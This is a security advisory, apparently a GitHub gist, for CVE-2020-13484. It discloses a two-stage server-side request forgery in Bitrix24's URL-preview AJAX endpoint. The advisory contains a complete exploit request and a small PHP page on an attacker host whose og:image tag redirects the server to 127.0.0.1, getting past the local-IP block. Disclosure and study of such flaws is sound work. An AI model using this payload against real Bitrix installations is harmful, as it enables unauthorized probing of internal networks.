CVE-2020-13484 | |
https://gist.github.com/mariuszpoplawski/26e1fbde8f9a607478bee1de90daa329 | |
------------------------------------------ | |
Bitrix24 through 20.0.975 allows SSRF via an intranet IP address in | |
the services/main/ajax.php?action=attachUrlPreview url parameter, if | |
the destination URL hosts an HTML document | |
containing '<meta name="og:image" content="' followed by an intranet URL. | |
------------------------------------------ | |
[Additional Information] | |
Vulnerability allow us to trigger server-side request forgery to remote | |
addresses and second vulnerability in this functionality allowed us to | |
bypass restrictions and generate other request that bypassed policy of | |
local IP block. We were able to generate requests in internal | |
infrastructure. | |
In first stage we have found SSRF that allowed us only send remote | |
requests. Then we manipulated the parser to parse our HTML page and | |
generate second request to internal bitrix core at server side. Bitrix | |
was prsing og:image tags, this way we could triggeer second SSRF. The | |
second request was not properly checked for "local" IP's. | |
To generate SSRF we need to trigger following request: | |
POST /bitrix/services/main/ajax.php?action=attachUrlPreview&show_actions=y&buildd_preview=y&die_step=3&admin_section=Y&show_cache_stat1=Y&clear_cache=Y&c=bitrix:main.urlpreview&mode=ajax&=&sessid=bd277e27ef185f42bebbb1d538e66574&signedParamsString=1.12&listSubscribeId[]=1&itemId=1&deleteSubscribe=Y&userFieldId=0&elementId=1 HTTP/1.1 | |
Host: 192.168.1.24 | |
Origin: http://192.168.1.24 | |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36 | |
Bx-ajax: true | |
Accept: */* | |
Referer: http://192.168.1.24/stream/ | |
Accept-Encoding: gzip, deflate | |
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 | |
Cookie: BITRIX_SM_TIME_ZONE=-120; BITRIX_SM_SALE_UID=0; BITRIX_SM_SOUND_LOGIN_PLAYED=Y; PHPSESSID=btu7cck1irm51hsgs45akh5dma; BITRIX_SM_NCC=Y; BITRIX_SM_LOGIN=admin; BITRIX_SM_LAST_SETTINGS=;show_cache_stat=Y | |
Connection: close | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 22 | |
url=http://OurVPSHost/index.php?id=1 | |
"OurVPSHost" host index.php file: | |
--------------------------------- | |
<?php header('Content-Type:text/html'); ?> | |
<meta name="og:image" content="http://127.0.0.1/fake_img.php"/ | |
--------------------------------- | |
Vulnerability send second SSRF, first one do not allow send internal | |
request but the HTML parser parse our og:image tag and send internal | |
request by redirecting bitrix server to 127.0.0.1/fake_img.php. This | |
way we are able to bypass the restrictions of bitrix core. | |
------------------------------------------ | |
[VulnerabilityType Other] | |
Unauthorized server side request forgery, bypass domain whitelist | |
------------------------------------------ | |
[Vendor of Product] | |
1c-bitrix.ru, bitrix24.net | |
------------------------------------------ | |
[Affected Product Code Base] | |
Bitrix and Bitrix Cloud instances affected - up to security update (main 20.0.975), reported and fixed in latest patch | |
------------------------------------------ | |
[Affected Component] | |
Main core URLPreview function | |
------------------------------------------ | |
[Attack Type] | |
Remote | |
------------------------------------------ | |
[CVE Impact Other] | |
Force server side request forgery | |
------------------------------------------ | |
[Attack Vectors] | |
To exploit vulnerability attacker need access to the website, valid | |
unauth session and CSRF token - all can be generated w/o any | |
privileges, no additional requirements needed. | |
------------------------------------------ | |
[Has vendor confirmed or acknowledged the vulnerability?] | |
true | |
------------------------------------------ | |
[Discoverer] | |
Mariusz Poplawski (afine.pl) | |
------------------------------------------ | |
[Reference] | |
https://www.bitrix24.com/prices/self-hosted.php | |
https://www.bitrix24.com/security/ | |
Mariusz Popłwski / AFINE.com team |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment